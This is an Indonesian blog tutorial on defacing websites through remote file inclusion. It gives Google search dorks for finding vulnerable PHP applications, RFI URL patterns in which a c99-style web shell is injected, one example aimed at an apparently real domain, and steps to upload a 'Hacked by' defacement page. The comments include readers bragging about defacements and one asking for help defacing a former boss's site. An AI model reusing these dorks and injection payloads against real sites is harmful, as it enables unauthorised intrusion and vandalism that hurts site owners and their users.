Home / Hacking / Cara Mudah Deface Web Via RFI
black-hat-logo

Cara Mudah Deface Web Via RFI

Cara Mudah Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url

[EvilShellInject] = inject rshell / c99 kamu

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com

– Site Oneadmin RFI

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]

– PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

– Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..

Nah setelah itu buadlah sebuad file: index.html

Isi dengan:
<html>
Hacked by Nama Kamu
</html>

Kemudian upload deh file ke directorynya

kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html

Enjoy

About Artikel

Check Also

hacking-ruby-programming-binushacker

Hacking dan Tuning Ruby Programming

Hacking and Tuning Ruby Programming Hacking Ruby Guidance Daftar Isi Materi Beberapa bab masih dalam …

56 comments

  1. .jare sopo blogspot nda bisa dideface?? jajalke iki sek cah
    http://malang-cyber.blogspot.com/

  2. aku juga iso deface blogspot

    ini buktinya
    http://xp1nank.blogspot.com

  3. Gue Juga bIsa Ni buktinya Blog Mantan saya ,

    http://buatyangulangtahun.blogspot.com/

  4. @akhyar
    @Deka=====>>>>> coba kalo bisa… paling-paling itu blog buatan sendiri… di desain kya gitu…bilangnya deface…. 😛

  5. bisa minta tolong gaaaakkkk…
    website mantan bos gw di ahaaaaaaaaaaaaaaaaaaaar keok deface ???
    siapa yang mau – surga

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *